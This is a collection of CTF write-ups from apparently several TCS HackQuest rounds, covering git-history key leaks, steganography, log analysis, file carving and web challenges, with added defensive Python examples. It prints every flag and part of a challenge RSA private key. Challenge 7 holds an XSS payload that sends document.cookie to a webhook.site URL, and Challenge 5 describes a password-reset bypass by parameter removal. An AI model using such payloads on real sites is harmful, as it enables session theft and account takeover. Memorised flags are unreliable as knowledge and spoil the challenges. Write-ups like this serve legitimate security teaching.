yielded the secret key needed to unlock the flag.

Flag: hq4{Jai#Hanuman01}

Challenge 2
Title: Leaks & Leaks
Points: 200
Description: Plug the leaks!
Download File: http://bit.ly/36xSEus
Solution: Unzipped the given file and found .git directory. Used `git log` to find commit history and
found commit with title `Oops. Removing AWS key`. Used `git log -p` to get difference in commit and
found AWS Key. Used this AWS key to retrieve the flag.

Flag: hq4{#M-Seal#1lakh#}
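The git history check behind Leaks & Leaks (here and in the earlier writeup that used git revert), turned into a detection routine as an added example, not either author's commands: it walks `git log -p` output, flags AWS access key IDs on added or removed lines with their commit and file, and reports which keys were ever committed, since deleting a key in a later commit does not take it out of history. The log text is constructed and the key is AWS's published example key, not a real credential.

```python
# Added example: scan `git log -p` output for AWS access key IDs and report
# the commit and file each one appears in. Sample log is constructed.
import re

AWS_ACCESS_KEY_RE = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")

# Constructed history: the key is committed in a .env file, then "removed" one commit later.
SAMPLE_LOG = """\
commit 4811fc0000000000000000000000000000000000
Author: dev <dev@example.invalid>

    Oops. Removing AWS key

diff --git a/.env b/.env
--- a/.env
+++ b/.env
@@ -1,2 +1,2 @@
-AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+AWS_ACCESS_KEY_ID=REDACTED
 AWS_REGION=us-east-1

commit 1111111111111111111111111111111111111111
Author: dev <dev@example.invalid>

    Add deploy config

diff --git a/.env b/.env
--- /dev/null
+++ b/.env
@@ -0,0 +1,2 @@
+AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+AWS_REGION=us-east-1
"""


def find_leaked_keys(log_text: str) -> list:
    """Walk git log -p output; return (short commit, file, 'added'|'removed', key) per hit."""
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith("+++ "):
            path = line[4:].removeprefix("b/")
        elif line.startswith(("+", "-")) and not line.startswith(("+++", "---")):
            for key in AWS_ACCESS_KEY_RE.findall(line):
                change = "added" if line[0] == "+" else "removed"
                findings.append((commit, path, change, key))
    return findings


def ever_committed(findings) -> set:
    """Keys that were added at any point in history: a later removal does not revoke them."""
    return {key for _, _, change, key in findings if change == "added"}


if __name__ == "__main__":
    hits = find_leaked_keys(SAMPLE_LOG)
    for commit, path, change, key in hits:
        print(f"{commit} {path}: {change} {key}")
    print("rotate these keys:", ever_committed(hits))
```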

Challenge 3
Title: Mobile Master
Points: 200
Description: The de“code” challenge!
Download File: http://bit.ly/2YLuOZo
Solution: Not Solved

Challenge 4
Title: Calling Charlie
Points: 100
Description: Roger the message!
Download File: http://bit.ly/38Dj3Zp
Solution: Given wav file contains morse code. Used Morse Code Decoder, decoding with threshold
value as 65 yielded JSDFHJKDSADK43 which was used to get flag.
Flag: hq4{hows!the!josh1}

Challenge 5
Title: Reset Password
Points: 200
Description: We have a new password reset functionality, is it secure though?
Solution: Captured the request for reset password in Burp suite and removed old_password
parameter from request which yielded the flag.
Flag: hq4{Iknowwtudidhq3}

Challenge 6
Title: WannaLaugh
Points: 300
Description: Time to laugh with WannaLaugh!
Download File: http://bit.ly/2YLuOZo
Solution: I couldn’t solve the challenge in time but I was able to un-compile the given executable to
its python source. This might be helpful for somebody.
Used python-exe-unpacker to unpack the WannaLaugh.exe, found `check` which was python
bytecode. Fixed the header (fixed check.pyc)and used uncompyle6 to get the source. From there
onwards it seems like a web challenge.

Challenge 7
Title: Excess Talent
Points: 300
Description: Send us the best jokes you have heard!
Solution: As the description states that we need to send developer jokes, it’s a hint that we need to perform XSS. We use a basic XSS payload
```<img src=x onerror=this.src='http://webhook.site/40c5ae99-a46b-482e-a2ea-005fb31c1c1d?c='+document.cookie>```
We make use of the webhook to catch the request made by the developer and find the flag in the User-Agent.
Flag: hq4{Virat!Kohli!17}

Challenge 8
Title: Card Monster
Points: 300
Description: The credit card monster!
Solution: Card Monster expects a Visa card first, which starts with 4 and has length 16, multiple times. After the Visa card the application expects a Mastercard, which starts with 5 and has length 16; keep sending Mastercards until the application yields the flag.
The task was automated with the help of the requests module in Python 3.
solution.py
Flag: hq4{shrek+Betal+VISA1}

Challenge 9
Title: Alien Message
Points: 100
Description: A secret message received from outer space
Download: http://bit.ly/2LSfLaZ
Solution: The given message was base64; decoding led to a PNG file, so I used a file descriptor to output the decoded stream to a PNG file.
The decoded PNG file was a QR code, scanned to get the secret and finally the flag.

Flag: hq4{They.will.come1}

Challenge 10
Title: Unlock Jarvis
Points: 100
Description: Find the key to unlock Jarvis
Solution: It was more of a puzzle than a web challenge and a nightmare for everyone. Nobody
solved it in round 1, which is why it came back to haunt us in the finals. The idea was to get the
GPS coordinates of all the cities mentioned on the website, take the integer part of each, and type
it on a T9 keypad. Once you have all the letters, use them to unlock the flag.
Unlock Jarvis came back as a 300-point challenge in round 2.
--------------------------------------------------------------------------------------------------------------------------------------
1. Digimagic

Flag: hq5{s0_Y0u_KN0W_HoW_$$1_worKs}

This was the first task I solved. The name is interesting, isn't it? From the name itself I got the idea
that the task was somewhat related to digital signatures.

In the task we were given a link. As soon as I opened it, an error page appeared. The error
was about the certificate, so I clicked View certificate under the advanced options.
A page opened showing the certificate for tcshackquest.com. Among the Subject Name and Issuer
Name fields there was a Locality entry, Bhubaneshwar, and next to it an XOR-encoded string. Decoding
it gave the flag.

2. Record

Flag: hq5{Malware_implement_persistance}

This challenge was about Windows event log analysis.

The task gave a link to a download. The file was a zip; unzipping it produced two files.

Since the challenge was about log analysis, I opened both files in Windows Event Viewer.

In an event 7045 (Service Control Manager: a service was installed on the system) the service name
looked suspicious: it was an encoded blob rather than readable text. Decoding it as Base64 gave the
flag.
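An added example, not part of the original write-up: the same observation turned into a check you can run over an exported System log. It assumes the events have been exported to dicts (as from a JSON/CSV export or python-evtx), keeps only 7045 service installs, and flags ServiceName values that are well-formed base64 of printable text, attaching the decoded name. The sample events are constructed; only the decoded flag matches what the write-up found.

```python
import base64
import re
from typing import Dict, Iterable, Iterator, List, Optional

# Constructed sample shaped like a JSON/CSV export of System.evtx. Field names follow the
# EventData of Service Control Manager event 7045 ("a service was installed"); the values are
# made up, except that the encoded name decodes to the flag the write-up recovered.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045,
     "ServiceName": base64.b64encode(b"hq5{Malware_implement_persistance}").decode(),
     "ImagePath": r"C:\Users\Public\svc.exe"},
    {"EventID": 7036, "ServiceName": "aHR0cDovL2V4YW1wbGU=", "ImagePath": ""},  # not an install
    {"EventID": 7045, "ServiceName": "WinDefend",
     "ImagePath": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def decode_if_base64(text: str) -> Optional[str]:
    """The decoded text when `text` is well-formed base64 of printable ASCII, else None.
    Real service names are short words, so the 16-character floor keeps them out."""
    if not B64_RE.match(text) or len(text) % 4:
        return None
    try:
        raw = base64.b64decode(text, validate=True)
    except ValueError:              # binascii.Error is a ValueError
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def suspicious_service_installs(events: Iterable[Dict[str, object]]) -> Iterator[Dict[str, object]]:
    """Yield 7045 events whose ServiceName is an encoded blob, with the decoded form attached."""
    for ev in events:
        if int(ev.get("EventID", 0)) != 7045:
            continue
        decoded = decode_if_base64(str(ev.get("ServiceName", "")))
        if decoded is not None:
            yield {**ev, "DecodedServiceName": decoded}


def decoded_service_names(events: Iterable[Dict[str, object]]) -> List[str]:
    return [str(hit["DecodedServiceName"]) for hit in suspicious_service_installs(events)]


if __name__ == "__main__":
    for hit in suspicious_service_installs(SAMPLE_EVENTS):
        print(hit["ServiceName"], "->", hit["DecodedServiceName"], "|", hit["ImagePath"])
```

The ImagePath is carried along on purpose: outside a CTF, the path of the installed binary is the field to pivot on next.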

3. Life of Pie
Flag: hq5{Tiger*Zinda_hei}

Yes, you guessed it right, this is a famous movie. The task asked something like "What
happens to the tiger at the end?".

The task consisted of a web page, lifeofpie.com. I took the URL and sent the request through
Burp Suite. Even Burp took a long time to load the content. The response contained a
noticeable element with id='link'.

This was the major clue. I repeated the request three or four times and eventually got a
response in which the id='link' element carried href='/pinepineappleapplepie'. A GET request
to /pinepineappleapplepie from Burp Suite finally returned the flag.

4. Reigie Rich

Flag: hq5{3nc2yp7*m45732}

There was a famous cartoon called Richie Rich; sounds similar, doesn't it? This task was about
the PHP preg_match() function.

The first thing I did was check the source with Inspect Element. It showed that the input was
checked against a specific pattern with preg_match().
The original string was hackquestchamp.

I put the first pattern in front as a prefix, then the original string, then the remaining
pattern as a suffix, so the magic string became
hackhackquestchampquestchamp. Pattern 1 was hack, pattern 2 was the original string and pattern
3 was questchamp.

Wait wait here’s the bonus…

The sole challenge I managed to solve in Round 2 (excluding GD).

Challenge name: It's Exposed!

Flag: hq5{50m3*pu811c}

The challenge was about data that ends up publicly available.

The description contained two focus words, "licenepab" and "arcanehqdev". Notice that they were
given in double quotation marks. I first googled the words without the quotes but found nothing
useful. Then I googled the string "arcanehqdev" (with the double quotes).

I found two links. When I opened the second one, I found a string on that web page. I copied that
string and used it on Pastebin, which gave me another string; that one I pasted into the web page
that was part of the challenge.
That’s It!

A pro tip: documenting your work and submitting the report is super important. This is ethical
hacking; without a report it would be called black-hat hacking. Many participants solved challenges but
didn't create and submit the report.

If you found this write-up useful, share it with the cybersecurity community. Hit that clap button so
that you get the flag in the next CTF you play.

Happy hacking!

------------------------------------------------------------------------------------------------------------------------------------
1. Metaverse

Given: Metaverse.zip

[p4ul@j0ker Metaverse]$ ls
Elephant.jpg  getMeToReachTheHeight.zip

So here we have a zip file and a JPEG. Unzipping the zip produces 300+ nested directories, and the
JPEG may contain some stego information.

1. Elephant.jpg

At the end of the picture you can notice the line `rot 18` or something like it.

[p4ul@j0ker Metaverse]$ exiftool Elephant.jpg | grep Comment
Comment : The Elephant stuffed the 'banana' into its mouth as if he was hiding from us

"banana" is the steghide passphrase, since the file is a JPEG (steghide handles JPEG, BMP, WAV and AU).

[p4ul@j0ker Metaverse]$ steghide --extract -sf Elephant.jpg
Enter passphrase: (banana)
wrote extracted data to "elephant_key.txt".
[p4ul@j0ker Metaverse]$ cat elephant_key.txt
6ryrcunagfgrcngngvzr

If you don't know the password, try Stegseek (it brute-forces steghide passphrases from a wordlist)!

2. getMeToReachTheHeight.zip

$ unzip getMeToReachTheHeight.zip
Are we going to walk down to the final directory by hand? No.

[p4ul@j0ker Metaverse]$ seq 400 | while read line; do cd getMeToReachTheHeight; done    (even with
huge output)
[p4ul@j0ker Metaverse]$ cp Tusks.docx /tmp/Metaverse

Note that in bash (without `shopt -s lastpipe`) the body of a piped while loop runs in a subshell, so
the cd does not survive the loop; in zsh it does. `find . -name Tusks.docx` reaches the file whatever
the shell.

Output:

• Rot18 vs docx

$ file Tusks.docx
Tusks.docx: CDFV2 Encrypted
All we need is a password to open this file.

6ryrcunagfgrcngngvzr is ROT18 (ROT13 on the letters, ROT5 on the digits), which an online tool such as
DenCode (dencode.com) decodes.

"1elephantstepatatime": give this string as the password for the docx.


Give this flag as input and retrieve the original flag.

That’s all!
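An added example for the two mechanical steps of this challenge, in Python and not the author's commands: a ROT18 routine (so the docx password is recovered offline, without pasting CTF material into a web tool) and a walk that finds the files at the bottom of the nested tree without knowing the nesting count. `build_demo_tree` constructs a stand-in for the unzipped archive; the directory name is taken from the loop above and the depth is an assumption.

```python
import os
import tempfile
from pathlib import Path
from typing import List, Tuple


def rot18(text: str) -> str:
    """ROT13 on letters plus ROT5 on digits. Each shift is half its alphabet, so the
    same function both encodes and decodes."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + 13) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + 13) % 26 + ord("A")))
        elif "0" <= ch <= "9":
            out.append(str((int(ch) + 5) % 10))
        else:
            out.append(ch)
    return "".join(out)


def deepest_files(root: str) -> List[str]:
    """Every file at the greatest directory depth below root, so the nesting count
    need not be known in advance (the shell loop above hard-codes 400)."""
    root_path = Path(root)
    best_depth, best = -1, []
    for dirpath, _dirs, files in os.walk(root_path):
        depth = len(Path(dirpath).relative_to(root_path).parts)
        if not files or depth < best_depth:
            continue
        if depth > best_depth:
            best_depth, best = depth, []
        best.extend(str(Path(dirpath, f)) for f in sorted(files))
    return best


def build_demo_tree(depth: int = 40) -> Tuple[str, str]:
    """Constructed stand-in for the unzipped archive: `depth` nested directories of the
    same name, a decoy file at the top and Tusks.docx at the bottom. Returns (root, bottom file).
    Kept well under PATH_MAX (4096 on Linux): 300 levels of this 21-character name would
    exceed it, at which point os.fwalk, which works on directory descriptors, is the tool."""
    root = tempfile.mkdtemp(prefix="metaverse-")
    Path(root, "README.txt").write_text("decoy")
    cur = Path(root)
    for _ in range(depth):
        cur = cur / "getMeToReachTheHeight"
    cur.mkdir(parents=True)
    target = cur / "Tusks.docx"
    target.write_bytes(b"\xd0\xcf\x11\xe0")   # CDFV2 magic, the wrapper `file` reported
    return root, str(target)


def demo(depth: int = 40) -> Tuple[int, List[str]]:
    """Build the tree, locate its deepest files, return (their depth, their names)."""
    root, _ = build_demo_tree(depth)
    found = deepest_files(root)
    level = len(Path(found[0]).relative_to(root).parts) - 1
    return level, [Path(f).name for f in found]


if __name__ == "__main__":
    print(rot18("6ryrcunagfgrcngngvzr"))   # the docx password
    print(demo())
```

Opening the password-protected docx itself still needs an Office-crypto library (for instance msoffcrypto-tool); the standard library stops at finding the file and recovering the password.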

2. Secure Shell
Here's a zip of a filesystem archive; they wanted the administrator's RSA private key!

1. Navigate

cd Datacenter-Prodserver/home/sysadmin/.ssh

2. Convert the OpenSSH key into RSA PEM format (ssh-keygen -p rewrites the file in place, so work on
a copy; -N "" sets an empty passphrase and -m pem selects the legacy PEM container):

[p4ul@j0ker .ssh]$ ssh-keygen -p -N "" -m pem -f id_rsa
Your identification has been saved with the new passphrase.
[p4ul@j0ker .ssh]$ cat id_rsa | head
-----BEGIN RSA PRIVATE KEY-----
MIIG4wIBAAKCAYEA5Qwf/+XGmVtO9OtjCyzE6/xtnywMFUY/MLZDCbItp06dtkXr
aRD3CYAj0vSsuNHlJwh6JK97ZaueTKqWy6MjZNHM1mAwsOjAOli/zGYqvfRJYN7+
mjeeZ7QAV7L0Tar3HX54KBLKH553rsPWhktF3hBdJsrtVhD+qgXETPP4yi1iJ/bt
QzccPBkd6IJF/T5xVrKozcUkWicT/Pq0+xY+w+6P3U7DJ7HAdKn5R8Dm9PY8c4tP
4bMt1h9GrgkGzWtlWiR3lxKcSE4q4D5x5lXiOc5wOnkM5A1RL1Fs41H9xEnZ0++9
/C11bpUM4TE/1Nuola5YZ9T4ZINkWXvv4sLaLzEWJOMazRDKvWSZRh/EfITho98z
2SSQhIIlKlGgajs/xhmq9bEQjxtbMb7LdmL67AWOC+RhFsT7l2A+jlWrAE/CDViv
Sxa5Zlw9ONraQCYiQbn3GbL0rhyGnfDloc9f2ySolfXV9hL9mjxnoJd5CIRX1LrY
u2t+uLHzgHzA4MODAgMBAAECggGAR65ZvV4NnyTiOugHoRGrtybSr8O7LFVFpVsE

3. Copy the whole id_rsa file and paste it into the challenge site.


That’s All.

3. Into The abyss

Given File:

[p4ul@j0ker tmp]$ file iamasimplefile.mp3
iamasimplefile.mp3: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Monaural

Analysing the Morse code was a waste of time; just go straight to extracting the hidden data.
1. unzip, foremost, deepsound, binwalk: use any one of these tools to extract the hidden file :)

[p4ul@j0ker tmp]$ unzip iamasimplefile.mp3
Archive:  iamasimplefile.mp3
warning [iamasimplefile.mp3]:  971963 extra bytes at beginning or within zipfile
  inflating: millionmiles.txt
[p4ul@j0ker tmp]$ cat millionmiles.txt
HQ6{Hidden_in_the_hex_million_miles_away}

The warning is the tell: a zip archive was simply appended to the MP3, and unzip finds it from the
end-of-central-directory record at the end of the file.
Copy and paste it into the site and retrieve the flag!

That’s all
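An added example, not the author's commands: the same carve in Python. It scans for the ZIP local-header signature to report where the archive starts, then lets zipfile open the whole buffer, which (like unzip) locates the end-of-central-directory record from the end and compensates for the leading bytes. The container that `build_sample` returns is constructed: a fake ID3/MPEG prefix with a zip of millionmiles.txt appended.

```python
import io
import zipfile
from typing import Dict, List

ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_EOCD = b"PK\x05\x06"


def find_zip_offsets(data: bytes) -> List[int]:
    """Every offset at which a ZIP local file header signature appears (binwalk's zip hits)."""
    hits, pos = [], data.find(ZIP_LOCAL_HEADER)
    while pos != -1:
        hits.append(pos)
        pos = data.find(ZIP_LOCAL_HEADER, pos + 1)
    return hits


def has_trailing_zip(data: bytes) -> bool:
    """An appended archive still ends with its end-of-central-directory record, which is
    what zipfile (and unzip) search for from the end; the MP3 bytes in front are tolerated,
    hence unzip's "extra bytes at beginning" warning."""
    return data.rfind(ZIP_EOCD) != -1 and bool(find_zip_offsets(data))


def extract_embedded(data: bytes) -> Dict[str, bytes]:
    """Return {member name: content} for the archive hidden in the container."""
    if not has_trailing_zip(data):
        raise ValueError("no ZIP signatures in container")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def build_sample() -> bytes:
    """Constructed container: ID3 tag + MPEG frame syncs, then a zip appended to the end."""
    mp3 = b"ID3\x03\x00\x00\x00\x00\x00\x00" + b"\xff\xfb\x90\x00" * 256
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("millionmiles.txt", "HQ6{Hidden_in_the_hex_million_miles_away}")
    return mp3 + buf.getvalue()


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) == 2 else build_sample()
    print("zip local headers at:", find_zip_offsets(blob))
    for name, content in extract_embedded(blob).items():
        print(name, "->", content[:80])
```

Point it at the real file with `python3 carve.py iamasimplefile.mp3`; the first offset printed is the "extra bytes" count unzip reports.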

4. Office Magic

Given:

[p4ul@j0ker office-magic]$ file *
TakeThatDreamTrip!.pst: Microsoft Outlook email folder (>=2003)
TastyTreats.mdb: Microsoft Access Database

1. Extract the mails and attachments from the pst file with libpst, rather than uploading it to an
online tool.

2. To install:

Arch: sudo pacman -Sy libpst libpst-docs


[p4ul@j0ker office-magic]$ readpst -S TakeThatDreamTrip\!.pst
Opening PST file and indexes...
Processing Folder "Inbox"
"Inbox" - 2 items done, 0 items skipped.
[p4ul@j0ker office-magic]$ ls Outlook\ Data\ File
Inbox

Check the files in the directory: file no. 2 contains the flag, or just grep the directory.

[p4ul@j0ker Inbox]$ grep -r HQ6
2:Visit Our Site to choose from a wide array of options. Hurry to get
the coupon HQ6{Its_Couponing_Time} and avail additional benefits

That’s all!

5. Satellite Imagery
Given :

[p4ul@j0ker Satellite]$ file challenge
challenge: data

• Nice, let's correct some magic bytes!

[p4ul@j0ker Satellite]$ xxd challenge | head
00000000: 5229 4646 2400 0000 5740 5633 666d 7420  R)FF$...W@V3fmt
00000010: 1000 0000 0100 0200 80bb 0000 00ee 0200  ................
00000020: 0400 1000 6461 7461 c0a1 5a01 b007 0000  ....data..Z.....
00000030: e60e 0000 3315 0000 321a 0000 951d 0000  ....3...2.......

• Changes to make: R)FF$...W@V3fmt => RIFF$...WAVEfmt, i.e. 0x29 at offset 1 becomes 0x49 ('I'),
0x40 at offset 9 becomes 0x41 ('A') and 0x33 at offset 11 becomes 0x45 ('E'). The fmt chunk that
follows is intact and reads as PCM, 2 channels, 48 kHz (0x0000bb80), 16-bit, which is a sensible
layout for an audio capture.

Let the game begin.

1. Listen, and guess a bit.

2. The description mentioned words like satellite, image and audio, so obviously it's QSSTV time!

QSSTV is a utility for dealing with slow-scan television (SSTV) signals.

deb: apt install qsstv
arch: sudo pacman -Sy qsstv

1. Open QSSTV => Options => Configuration.

Tick "From file", so that every time QSSTV is opened it asks for a file.
• Now close and reopen QSSTV.

• Give the repaired WAV file as input and get the result.
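An added example, not the author's: the magic-byte repair done in Python, together with the check a practitioner wants before feeding the file to QSSTV, namely that the fmt chunk decodes to self-consistent PCM parameters and that the data chunk implies a plausible playing time. The input is the first 0x40 bytes transcribed from the xxd output above (the rest of the file is not reproduced). Only the two signatures are patched, as in the write-up; the RIFF size field, which at 0x24 covers no sample data, is reported rather than rewritten.

```python
import struct
from typing import Dict, Iterator, Tuple

# First 0x40 bytes of the challenge file, transcribed from the xxd output above. This is the
# example's constructed input; the remainder of the file is not reproduced here.
CHALLENGE_HEAD = bytes.fromhex(
    "5229 4646 2400 0000 5740 5633 666d 7420"
    "1000 0000 0100 0200 80bb 0000 00ee 0200"
    "0400 1000 6461 7461 c0a1 5a01 b007 0000"
    "e60e 0000 3315 0000 321a 0000 951d 0000"
)


def is_wav(data: bytes) -> bool:
    return data[:4] == b"RIFF" and data[8:12] == b"WAVE"


def repair_wav(data: bytes) -> bytes:
    """Restore the two signatures `file` keys on; nothing else is touched."""
    fixed = bytearray(data)
    fixed[0:4] = b"RIFF"
    fixed[8:12] = b"WAVE"
    return bytes(fixed)


def iter_chunks(data: bytes) -> Iterator[Tuple[bytes, int, int]]:
    """(chunk id, declared size, offset of payload) for each RIFF sub-chunk after 'WAVE'."""
    pos = 12
    while pos + 8 <= len(data):
        cid, size = data[pos:pos + 4], struct.unpack_from("<I", data, pos + 4)[0]
        yield cid, size, pos + 8
        pos += 8 + size + (size & 1)           # chunks are word-aligned


def parse_fmt(data: bytes) -> Dict[str, object]:
    """Decode 'fmt '; refuses a container whose magic is still wrong."""
    if not is_wav(data):
        raise ValueError("not a RIFF/WAVE container")
    for cid, _size, off in iter_chunks(data):
        if cid == b"fmt ":
            fmt, ch, rate, byte_rate, align, bits = struct.unpack_from("<HHIIHH", data, off)
            return {
                "format": fmt, "channels": ch, "sample_rate": rate, "byte_rate": byte_rate,
                "block_align": align, "bits": bits,
                # the fields must agree with each other; corrupted headers rarely stay consistent
                "consistent": byte_rate == rate * ch * bits // 8 and align == ch * bits // 8,
            }
    raise ValueError("no fmt chunk")


def describe(data: bytes) -> Dict[str, object]:
    """fmt fields plus the declared RIFF and data sizes and the playing time the latter implies."""
    info = parse_fmt(data)
    info["riff_size_declared"] = struct.unpack_from("<I", data, 4)[0]
    for cid, size, _off in iter_chunks(data):
        if cid == b"data":
            info["data_bytes"] = size
            info["seconds"] = round(size / int(info["byte_rate"]), 2)
            return info
    raise ValueError("no data chunk")


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            fixed = repair_wav(f.read())
        with open(sys.argv[2], "wb") as f:
            f.write(fixed)
    else:
        fixed = repair_wav(CHALLENGE_HEAD)
    print(describe(fixed))
```

Run as `python3 fixwav.py challenge challenge.wav` to write the repaired file; with no arguments it reports on the embedded header bytes (about 118 seconds of stereo 48 kHz PCM, which is a SSTV transmission's worth of audio).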


--------------------------------------------------------------------------------------------------------------------------------------
